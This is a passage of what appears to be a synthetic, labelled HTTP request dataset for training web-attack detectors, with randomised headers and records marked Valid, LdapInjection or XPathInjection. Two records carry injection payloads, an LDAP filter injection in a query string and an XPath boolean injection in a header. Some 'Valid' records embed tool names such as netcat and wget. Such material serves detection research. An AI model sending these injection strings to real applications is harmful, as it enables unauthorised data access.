Authorization: Basic b2VnMXg2OmF0ZW5zRnI5
Range: -0418,8-
Referer: http://eeestotT.gov/osUn/jfdojye/lYEae.cgi
TE: gzip,trailers
Trailer: Authorization
User-Agent: gnofu3a/4.7
UA-CPU: StrongARM
UA-Disp: 098,469,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 796x812
Via: FTP/8.9 248.227.181.240, HTTP/3.3 198.93.213.59, trt/3.3 www.hsfwKuus.css:733
Transfer-Encoding: 2sqe; pitrww7s=mreUAah
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3246
Start - Id: 38788
class: LdapInjection
GET /n7mhahoi8tzOFt/C5mailZxpositionbx/cpoCCU.uoA@SEvti/dspreG/pKyrRvvJR.3/er/tL7uKmA-3uxVwNJn/onH6VG-/aree7souee.tiff?eaeh5iRtvE2ow=9074512&qfRE=621015&nm7ehNtytnteM=%29++++%28++%7C++%28displayName%3Dhad*%29%28name++%3D++had*+++%29%28mail%3Dhad*%29 HTTP/1.1
Host: www.ee5t.net
Connection: close
Accept: audio/x-wav;q=0.0, audio/basic;q=0.0
Accept-Charset: x-mac-cyrillic;q=0.4, windows-1255;q=0.3, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 103.114.5.31
Cookie: ra5eethod1nw=lBa;Nor-giUgR@autoexec=81080648;Iuis3=dSyKw@Ss88z;Oa6aioi=92;ovEmaMsrtdihcep=ryI
Cookie2: $Version="919"
Date: Sun, 15 Jul 07 09:02:20 UTC
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Wed, 28 Dec 05 11:26:19 GMT
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic dGVoYTpxMmNjaA==
Range: 777808-9828,-9730,-076
Referer: http://www.ay7eNiat.org/oeej/tscsa.dll
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/6.0 (compatible; Konqueror/8.7; Unix; ncfdu9l; twsobd; l8iti)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: FTP/7.0 32.102.43.60
Transfer-Encoding: compress
Upgrade: cjw/0.8, roll/0.1, tytuee/5.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38788
Start - Id: 24920
class: Valid
GET /no/jSPssApR9aVrK8eXg@f-/huT0DmDViwajnUu4qRb0/a@Id95XaIHOs7-qR/mOTbAnetcatkPRsDFcWM/inmodho0g5lrrabtcin/6b2.jpg?aifaiolh5E=%5Cintt&qLfa8o3tgnprTs=d8%2BCmzch3aiw&teh=9&awnsbNs=3288278214&elwechaooNmsddM=44851772&GMr=huQIsJLe2&yCep=aqsiriy6t0&symctaanibyueaa=cm-z&mboebiscript=bWuDI_sO7Et&gvihnsbist=4 HTTP/1.0
Host: 239.24.203.78
Connection: close
Accept: application/*, video/*;q=0.3, video/quicktime;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.63.57.145
Cookie: bdei=is0iect;ohho=1t:0|bninRei i;8npeo0sndaeov=tzizeyuavsexece;tnFewp=bA;efraSywp=ak8og;vaDmjy0F@s=4037942
Cookie2: $Version="0"
Date: Wed, 13 Jun 07 24:01:41 UTC
ETag: W/"94Jp1voaoqMA_sTF"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Fri, 17 Aug 07 10:04:56 GMT
If-Unmodified-Since: Tue, 07 Dec 04 10:19:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Dec 04 14:41:06 CET
Max-Forwards: 2937
MIME-Version: 9.8
Pragma: ba=EEnoy
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic YXNjZTpJM0lvbw==
Range: -47448,86125-296,-084
Referer: /elblatei.pdf
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Range
User-Agent: sio3hrtes (yGR2QMY6; twsU0I; 4esvMppTu; rFNBOd; tMz63T)
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8559x9210
Via: xraaru/5.1 24.116.155.166:55692, FTP/6.4 www.h9aaHp.tiff:81004, 7.4 122.99.196.171
Transfer-Encoding: cjcuh
Upgrade: eioe/8.0, tttl/1.6, aeanad/4.0
Warning: 458 85.135.15.199 "githTe" "Sat, 19 Apr 08 21:56:38 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24920
Start - Id: 16103
class: Valid
GET /4__d_hG/owwodLt/3DRz-sZ9XGsampG/slinrtirneCt/bM-c6@59DvYse6/atOoRA/sar/ltt/2ky/rsyiAeNs/ur3Tati.exe?sen2ehSr=845&eqeewgli=tjL%407xoDau%40O&r7fmtxAa=2eatmpftpeR&tmehot63=48&ual9too=9o&6hrY1edk=26251&hs=784&3f=273287 HTTP/1.0
Host: 111.127.241.153
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: suF-orw;q=0.5, te-smgix75, pTeibiun-sa3ss;q=0.7, en-tean5ald;q=0.4
Cache-Control: oalotC=Y
Client-ip: 151.153.162.122
Cookie: eeE5sEhqhpiug=aU7Th-nnc;shc011nlfgyu=So
Cookie2: $Version="74"
Date: Sat, 28 Oct 06 20:29:12 UTC
ETag: W/"Zt4I3TqiVnltD9eR@d"
Expect: 7e7t=az3te;Nocerre
From: exir@MtsL5edgR.cz
If-Modified-Since: Mon, 20 Jun 05 17:11:29 UTC
If-Unmodified-Since: Tue, 11 Nov 08 15:00:05 UTC
If-Match: *
If-None-Match: "KqyQFOEbWJj_C5veRsB"
If-Range: *
Max-Forwards: 6
MIME-Version: 3.0
Pragma: l=bDise
Proxy-Authorization: Basic cmlkZXdlOm9panNpc25y
Authorization: NTLM YWF0ZWVsb3dyb2wwZWhvNG5sd2VzaXN0d25zd2VsbnNrMmFyZGN3ZHJu
Range: 303812-992,8-0,-1
Referer: http://www.receb3Ab.com/thoo.mdb
TE: trailers,gzip,trailers
Trailer: Referer
User-Agent: Mozilla/1.2 (compatible; MSIE 5.0; WinNT; a32Zwpkhii)
UA-CPU: StrongARM
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4520x648
Via: HTTP/4.5 164.97.46.95, FTP/2.7 www.cln2Wdn.gif
Transfer-Encoding: compress
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16103
Start - Id: 378
class: Valid
GET /eNDbYIhuhwxZN/pefhhffdt/kBXQcIMpe6/mzI2/it7lDeb2OHYjO7/ehsasstshiaRoIobeG/puafwconfeito2D.html?Oas=%7Er%28sock_stream%24&5ElDdnodehome6=eUdZs6&3eGOK2m5F@l1=1dpuoiltnmtr&nlusmoliaag=rIlI9_0IfY0s&Z0rselectJI.X@C=hlsrm9eanl4dt0wTz&ldc=Tlt%5Ddnkt%3D%2Fisn%7Cmlwgetl&43oeslesnbopoS=uTservices&syYoeOlsMp4=s7VBhB8jiK&anRshriesem=includehx%3A&cdaseoeqGeondrd=x6eaOs&itpu6cxhswo=ouwOt&amteIrl7oeipsba=17235 HTTP/1.1
Host: 111.6.149.106
Connection: close
Accept: video/quicktime, audio/x-wav
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, compress, identity, identity
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 68.69.216.23
Cookie: xG3fwtEde=ldtsinclude71+ioytrasmaa5 ;ae=24716643;ztnixog1=sNA@etea0pq
Cookie2: $Version="75"
Date: Thu, 26 Mar 09 24:43:59 CET
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: DbbWly@nefyhddm.ch
If-Modified-Since: Wed, 15 Sep 04 02:44:37 GMT
If-Unmodified-Since: Fri, 26 Nov 04 04:50:43 UTC
If-Match: *
If-None-Match: "N@bTnUGkWboYrWk0"
If-Range: Wed, 05 May 04 04:43:42 CET
Max-Forwards: 99
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest username="iWrams"
Authorization: hfiTg ty8r9=xidia
Range: 60-95,-13,615-290
Referer: /alneu.php
TE: trailers,trailers
Trailer: Connection
User-Agent: 1jhgDW http://www.oOez2rbE.com
UA-CPU: x86
UA-Disp: 4410,166,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0511x714
Via: HTTP/6.4 19.219.89.47
Transfer-Encoding: deflate
Upgrade: tohb/5.5, wosd/8.3, a7t/8.4
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 378
Start - Id: 2101
class: Valid
GET /ieoditnildd5ncYaO/FhJ21_/sT2KHV4ENybYOtx/na1hEia.dll?jiNFs4rhmam=n0tLE%5Drar0uch4a&RRf2RD=ieehjiEh&itss8ktuO3=ljxcpkNwJs&qhttpsLSyY3p6=c&qlln=%27Lt%3Bo HTTP/1.0
Host: www.yiHee.it
Connection: close
Accept: image/gif;q=0.3, application/*, text/xml;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.4, identity
Accept-Language: Ae-ioeLOx
Cache-Control: max-age=99
Client-ip: 152.109.97.244
Cookie: bzceieiza=doN
Cookie2: $Version="8"
Date: Sat, 03 Oct 09 11:52:50 UTC
ETag: "9n1bjFooGMi0kZKt0a9"
Expect: nsgId
From: nl0fyslt@tlSn3roowo.be
If-Modified-Since: Tue, 27 Nov 07 08:31:07 UTC
If-Unmodified-Since: Tue, 29 Dec 09 22:49:52 CET
If-Match: "b0SFFqHMDrcaE-7vK5n"
If-None-Match: "tfT.dNUrTuipT5Rin"
If-Range: "PtEkq3D4UPvWWmRaebJ"
Max-Forwards: 6
MIME-Version: 2.0
Pragma: r6btwo=n
Proxy-Authorization: Digest nc=FCb0e6a1
Authorization: NTLM cmVoZWV3MnN4aDNNYWtsc2VlY3Nhem5oZGF6b3JldUVkdENlYXNlYWVpbXRhZXU=
Range: 621-,04-,-085540
Referer: /i4sT/aernca/IedO/sdar.txt
TE: trailers
Trailer: TE
User-Agent: Mozilla/0.8 (X11; U; Open BSD i386 2.7; In-rq; rv:6.9.6) Gecko/69754418
UA-CPU: Sparc
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: ftd/0.0 www.tja1slgC.tiff, dadr/4.6 www.biedsbta.tiff, 1.0 www.oeoigtne.gif
Transfer-Encoding: deflate
Upgrade: gknraU/3.9, fTtni/6.7, lssm/8.2, Jw7uEL/4.0
Warning: 176 192.65.47.200 "nii9pvEb56r" "Thu, 12 Nov 09 15:01:18 UTC"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2101
Start - Id: 34586
class: Valid
POST /@-5zg/eN31xPK5ltCgns/khwceaeoinosegl6n/hGlnCIHD7-7/xsiweEwoeuo/teoOr57werdemyeepo/afs2wruaeeuAxeh/0IzxmH5xXUI7.js? HTTP/1.1
Content-Length: 237
Content-Language: oo8kITd,co9est,oA9y3c
Content-Encoding: compress
Content-Location: /ateOh/sqesue/tBahs.fgf
Content-MD5: cGN5ZTV0YW1BbWhiYjFyRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:02:48 UTC
Last-Modified: Sun, 01 May 05 03:47:22 CET
Host: 153.156.94.148:80
Connection: keep-alive
Accept: image/png, audio/basic;q=0.3, audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: eMs-e5ae, o3-1jiow, cbhatn-IpE;q=0.5, n-vet8p, 3ef-ajst
Cache-Control: no-transform
Client-ip: 101.186.217.139
Cookie: rfsi2viAaSo=erela;jwteMtoWo38nddr=o&eewce:zhtelnetsTut&u;mmE1HEZwD=tvhtg;0cc=aqNi7iH4_mF.;rmex7Bs=h9eim2tesxo2;tqtnkhaEtso1=h8zaUY
Cookie2: $Version="5"
Date: Sun, 04 Jun 06 10:44:12 GMT
ETag: W/"KPKlUFLo-_mo_Mefai"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Fri, 09 Apr 04 17:50:16 CET
If-Unmodified-Since: Mon, 25 Jan 10 19:46:03 CET
If-Match: *
If-None-Match: "VKTy9QHX2rYTYjO"
If-Range: Wed, 25 Apr 07 08:57:22 UTC
Max-Forwards: 16
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest opaque="aerr"
Range: 1867-,-2727
Referer: /hsf5tsa/heluthd/hnrevNt.conf
TE: gzip
Trailer: Date
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 4.6; qo-go; rv:5.5.8) Gecko/69498493
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 212x4185
Via: FTP/8.3 20.209.187.254, 2.0 www.tdnae.html
Transfer-Encoding: gzip
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 7.90.1.179
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eDN1_=236&2iuin8neiiohth=4sh&ReE6a3e=)icNratmpfco<37li\opennrn&Dfi9sozk1=sZqTwPsKt&Lh2=agaitH&fadchroi0dglEgx=no2af&tgpsnd=wlGyUY&euk=f5-njiTbar mailo n&bina5bwoiafr1si=Xtsc ueochildny2LrV&u5=zst&e9ohH=32546120&xxtermFrbg=HenOwm2ba

End - Id: 34586
Start - Id: 8406
class: Valid
GET /o8JqVN5lZwZm6P4DH3d/htnt/deq_2BxpAlPuU9rJ9QU9/ntgibbsntteis27jq/tCDYLX9H@/rnheatTR4ho4TvBldCh/aAuo5uo/dRkGqQ.3JopenY/iDMpSBQ07ReniZcCP2/c_yx.cgi?ts=eesuPne2lsnb&3btgeimlopsse=116229&ZT8uRnullFs=sr&hqvYitk=u&wDmM=5181 HTTP/1.0
Host: www.rtnhmr.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7, identity, deflate;q=0.4, gzip, identity;q=0.8
Accept-Language: *;q=0.6
Cache-Control: Denp=sree
Client-ip: 120.161.56.52
Cookie: netnehtot=397;GSJi5.MCqMsystem=o&rcpandh;ausFnhrefge=erkxterm slt;deiutaBeeofrg=tteliodapSue
Cookie2: $Version="5"
Date: Mon, 09 Oct 06 20:09:59 GMT
ETag: W/"yMsnma215J4vBEp"
Expect: meswe=yem4tw
From: vrT4@rhtowie.net
If-Modified-Since: Mon, 05 Sep 05 09:56:30 CET
If-Unmodified-Since: Thu, 22 Jun 06 17:36:19 UTC
If-Match: "4gcMojmOKrWByLK424Ju"
If-None-Match: "Rwvrh9Z-jQd15vuDjpPO"
If-Range: "GuGW00@rOF01fZRQv"
Max-Forwards: 766
MIME-Version: 8.4
Pragma: 4='rhneca9c'
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: hrgiCh 5sac=3dlC4ddr
Range: 994131-66069
Referer: /nvitaon.asp
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: dawar/8.5.0.1.3
UA-CPU: MIPS
UA-Disp: 755,5837,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 928x374
Via: 9.4 111.207.105.120
Transfer-Encoding: identity
Upgrade: dvu6s/4.4
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8406
Start - Id: 32086
class: Valid
GET /MKE/7aeeznkefnt4ryaaRnsA/nWdEc1-AuXptWmFHRD/wp-kZF/eseneed6tl169t4i.html?setywng=sjwindow.openiekyd8-1psua&bddeiNddcpOojr=omb&dtExr0eI5tl=ak%29s&sK4u15nc99Wwinnt=06702&5ureToeerxew=o+3lNhNtnLto&t8Sddr=E5e4hrwaed%7EBa%7C&eir8eajUeewot=s+l7daeer HTTP/1.0
Host: www.srhOen.de:385
Connection: close
Accept: video/*, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.2, gzip, identity, identity
Accept-Language: rm3Ogafa-fdreh3;q=0.0, 3e-0;q=0.8, taeaPThl-n7Ee;q=0.2, vquoueca-r8r, asc0lias-6ocre;q=0.3
Cache-Control: ue='oeea5h'
Client-ip: 213.43.173.123
Cookie: ursjhr=218;ohw5fi6ge=7@2iw;EdeleteiiHE=5etusru;osMhchhabiepsii=604961;@documentgroup bycopyQA=c8e;1ou8gAsehasmflS=liR1ETmtgN-D
Cookie2: $Version="24"
Date: Sun, 07 Mar 04 23:39:50 UTC
ETag: W/"b7IU_61v0leJB5e7.Ux."
Expect: 100-continue
From: tetisto@d9naat.be
If-Modified-Since: Tue, 02 Nov 04 12:49:32 UTC
If-Unmodified-Since: Fri, 23 Jan 09 06:07:35 CET
If-Match: "Ypo8_okI1B1.PcmLFQ"
If-None-Match: "ug-d7qVZsXT9R@lD4C"
If-Range: Wed, 08 Jun 05 11:53:43 GMT
Max-Forwards: 0
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 409-001,9959-4327,17574-972
Referer: /oays2.css
TE: trailers
Trailer: From
User-Agent: Mozilla/8.1 (Windows; U; WinNT 5.3; ei-53; rv:7.7.5) Gecko/93310321
UA-CPU: MIPS
UA-Disp: 929,743,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: FTP/3.9 www.hmejTh.png
Transfer-Encoding: compress
Upgrade: ehn/6.4, 9i5pap/5.7, Nsq/6.8, tuay3o/2.7, esA/8.9
Warning: 016 25.68.94.166 "waqtcrQansteysdLb" "Mon, 16 Feb 09 09:37:11 CET"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 34758865476448808371
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32086
Start - Id: 48359
class: XPathInjection
GET /tDcPuZTGE/lNnde0f9fh3/eFAN1rl4BhomeYR1/doROpeiaQaonetpon/t8x67C2GUTB0G0l/eahotmoneedoes0/ie.mspx?er8iena33oo=5Gaa&yienleg3t=54758&rXtemEtin=ne7gnbet0l&dk3=893&dtrtQrcert5is=ir%2Fet+thiframehX+%5Bs&Gbnmochas_Lcmd@gK3=0httpdtvSniiz%7Egheeo+r&A_gd4jfq=578197&0.sam17_gJ-=tn3++&7-tS-JVB@dK=cnode&dStHunse5aaStl=gpb1tbanreecAh2ae HTTP/1.0
Host: 160.145.147.251:0
Connection: close
Accept: image/*;q=0.6
Accept-Charset: *
Accept-Encoding: Aieisna'     or     1<    e/a/dwrm/child::text()[position()=096]   or     'goti4igN'    ='
Accept-Language: root-elasWz, odl6-S7tyngip;q=0.6, cnkha-Ryo;q=0.8
Cache-Control: no-transform
Client-ip: 107.146.131.163
Cookie: Mrz=aicir9hrPrhKfOus
Cookie2: $Version="8"
Date: Tue, 07 Dec 04 19:23:45 GMT
ETag: W/"DiaYz0AA1cS12qGseo"
Expect: thOy7e=Ytrrd
From: o7ey@teavftoi.com
If-Modified-Since: Tue, 29 Jun 04 04:26:19 GMT
If-Unmodified-Since: Fri, 01 Jul 05 19:46:13 GMT
If-Match: "VsccFMUpV8RCJ_v"
If-None-Match: *
If-Range: *
Max-Forwards: 020
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: nya1hs uees=eeteostl
Authorization: idn2 t3g6oh4=t46e
Range: 77-2889,6-
Referer: http://fleBrl.com/hr1PiIs/Drdte/tSls7h.js
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (compatible; Konqueror/7.8; Linux i386; uef7wefG5; CoplbiNmEs)
UA-Color: color32
UA-Pixels: 784x5970
Via: motuc/5.2 169.45.209.141:44330, 7.9 www.eghaUoqD.css
Transfer-Encoding: identity
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48359
Start - Id: 31987
class: Valid
GET /7clS/uJhf10/nxrcsdaT7anftmfobs.shtml?r3t=fnael&wstz1ientacnts=eHo4eo&tmontebl=oZ753JKrbYQ&rs4l3=etephpbody&9ZE=515130191&nac3raaoh=wf2SJajXL&e0e5er=or+%2F7m&IjlkusrX=ejBuIWoa&DCJVygMthevalmocha=hhemei5&l09=s&S1n=zaiibhesgsivnU&ef2erthn=8HOSWk5Q9-c&2mDUstdinGzform=aAkd HTTP/1.0
Host: 233.234.246.60:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-15;q=0.8, windows-1257, euc-kr, iso-8859-8, x-mac-ce;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.252.147.151
Cookie: 5bxspe3eeaT=675902476
Cookie2: $Version="14"
Date: Tue, 24 May 05 15:22:34 UTC
ETag: W/"7RTLYC0kdTbJYfHK2wv."
Expect: 100-continue
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 23 Aug 09 16:03:32 GMT
If-Unmodified-Since: Sat, 13 Oct 07 01:04:03 GMT
If-Match: *
If-None-Match: "ZwBMUbLhNBCiCxMaGoto"
If-Range: Sat, 22 Apr 06 13:22:33 GMT
Max-Forwards: 6573
MIME-Version: 0.5
Pragma: ahlyxuuo='f'
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: Basic MmViRWFBYTA6bXJteW4=
Range: -63549
Referer: /zvwuaOpd/8twece8/hiptL/tpofhg.pdf
TE: gzip,chunked,gzip;q=0.6
Trailer: User-Agent
User-Agent: fHs8ecpeo/6.2.4.0.2
UA-CPU: Sparc
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3694x8259
Via: 4.8 210.59.145.43, FTP/9.3 www.n9ogi.jpg:81776
Transfer-Encoding: deflate
Upgrade: tfuje/2.1, fIdmlr/9.4, ntwH/7.7
Warning: 334 109.21.12.244 "syTthysdtcj6teaty7" "Sat, 23 Jan 10 14:32:37 GMT"
X-Forwarded-For: 241.255.67.216
X-Serial-Number: 811726
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31987
Start - Id: 15755
class: Valid
GET /rmisqabb/sksrodnASsed5Eiztd.js?tLpt12ksmoh=%29vdelete&dinHa9IO2kwhbl=wineT&aflvDM3L=ri&mrols4bnscUnrmn=s91 HTTP/1.1
Host: 44.229.9.221
Connection: cRpC
Accept: */*;q=0.9
Accept-Charset: windows-874, iso-8859-15, euc-cn;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: ipdt2k=4dyoa
Client-ip: 68.15.253.89
Cookie: tbdle9a=31568120;nteE7suhsirep=7;_kzEnRXy0H=cQNHfw3Oz
Cookie2: $Version="5"
Date: Mon, 13 Oct 08 06:47:53 UTC
ETag: W/"8gjWBxU9zw2EktF"
Expect: 100-continue
From: Ptcoirt@emaueRf8s.fr
If-Modified-Since: Thu, 13 May 04 08:44:15 GMT
If-Unmodified-Since: Sun, 28 Jun 09 10:25:47 UTC
If-Match: "ocfpziy6HWCt2iUJ7EP"
If-None-Match: "NDBZjG4buq98467A9J"
If-Range: *
Max-Forwards: 9342
MIME-Version: 7.7
Pragma: u=et6
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: NTLM Y25pa3JuaGVzY3NsVHNpbmxkMGFlZWVzZWZoeG9ndW9hdE1rdFRmekF0ZGFTb2Vv
Range: -8290,128062-441231,3-
Referer: http://dpch7.gov/ylhJr.cgi
TE: chunked,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (compatible; MSIE 6.9; Windows NT; dasrl; oitLaseE)
UA-CPU: MIPS
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 516x1974
Via: 6.2 www.asieile.png, FTP/6.0 246.173.242.30, 3.6 www.tinl.jpg
Transfer-Encoding: gzip
Upgrade: fav/1.1, ayrmt/1.8, brsiit/7.7, udri/7.9
Warning: 240 81.227.30.13 "eamm5" "Mon, 26 Dec 05 16:14:01 UTC"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15755
Start - Id: 16155
class: Valid
GET /e38g/OovLn/xTMYsY23Dnk/eF5ZNF-1GUMT/jmF7SZYdlocation7smZ/ni_/e1Bua7GCb8aI/2wtAs.swf?s45=gngpdjenEeforohmE&heYsioeeltta=%27%2Ft6l&ks=uy%7C&7hdeafyot8uR=88772072&hfim=929527492&b9Xh=123081369&asutTDn=tnY1ini%2Fbt&aaqoshob=827647085&RjbetweenBjwXzvI=el+s&dasx=94xh52o6lpejmr&buSet=9451434&si86iOce=aT2BahQdLG HTTP/1.1
Host: www.8elnbr.cz
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=7
Client-ip: 163.65.92.102
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="737"
Date: Sat, 10 Jun 06 01:58:32 GMT
ETag: W/"5GqYSV1L-MHzvD_"
Expect: dasaoNn
From: nt6y@jrn3wp.st
If-Modified-Since: Fri, 13 Jul 07 11:26:59 CET
If-Unmodified-Since: Mon, 29 Aug 05 08:17:11 GMT
If-Match: *
If-None-Match: "Z-a2A1Ed3sxNEWy"
If-Range: "2kyHdvUh8coht33"
Max-Forwards: 8253
MIME-Version: 0.7
Pragma: n2mtialf='q'
Proxy-Authorization: Digest uri=http://cU5vaEqM.net/bddo2k.exe
Authorization: Basic YmVydGRhOmFibXh0c2Fo
Range: -6,88514-
Referer: http://veaocpuh.com/topsh/MdeAt.txt
TE: trailers,trailers
Trailer: Authorization
User-Agent: ibPdfHy http://www.pef5hbe.de
UA-CPU: MIPS
UA-Disp: 6343,6602,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 846x8936
Via: HTTP/5.0 49.180.186.178, 9.5 www.torzma.htm, HTTP/9.5 www.et8esD.js
Transfer-Encoding: hwhhba; hrpo9=watnuz
Upgrade: c7s/6.3, sdds/1.7, hGed/6.3, sda/9.3
Warning: 974 167.121.41.130 "gczrblTleio" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 170443509058668191
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16155
Start - Id: 16388
class: Valid
GET /rH833uqANueveOOjBF/C0uzyc5e0aepf4g8hoa/ik/tnIcNprt/sdqk4IlcjSN7UdNqtMc/cett/t_J0u@B78puUoY/ai1i/1PiMXboot.iniw/drt2melnY9t.html? HTTP/1.0
Host: 18.183.216.64
Connection: suno
Accept: */*
Accept-Charset: euc-tw, utf-8
Accept-Encoding: *
Accept-Language: miw1soh-hhtnr2ni, tynzthi-ot;q=0.5, im0ilO-gLnwM, Rb4-Oadx, vlsncm-gMieasez
Cache-Control: max-age=71
Client-ip: 47.227.109.121
Cookie: aahklwotila=Om;ldiitrstdweo=xjwhn]bou;hrnrsYu=f;r;ku8ht4Imadte=i/ 5n;rpo0n=gdneloeypl1fLn;lw8anonAi=cnatieP
Cookie2: $Version="740"
Date: Sun, 19 Jun 05 16:35:45 CET
ETag: W/"iU@OCIQz7G.@o5g"
Expect: 100-continue
From: piRire@gfja0tm2d.be
If-Modified-Since: Tue, 06 Sep 05 12:35:01 CET
If-Unmodified-Since: Sat, 12 Jun 04 12:38:30 GMT
If-Match: *
If-None-Match: "CL1wCm3TdmWyUjrVz9"
If-Range: Tue, 23 Jun 09 05:11:52 CET
Max-Forwards: 3
MIME-Version: 2.3
Pragma: a8ame4=pbi
Proxy-Authorization: ihnaT sR5Ne4c=iwllit
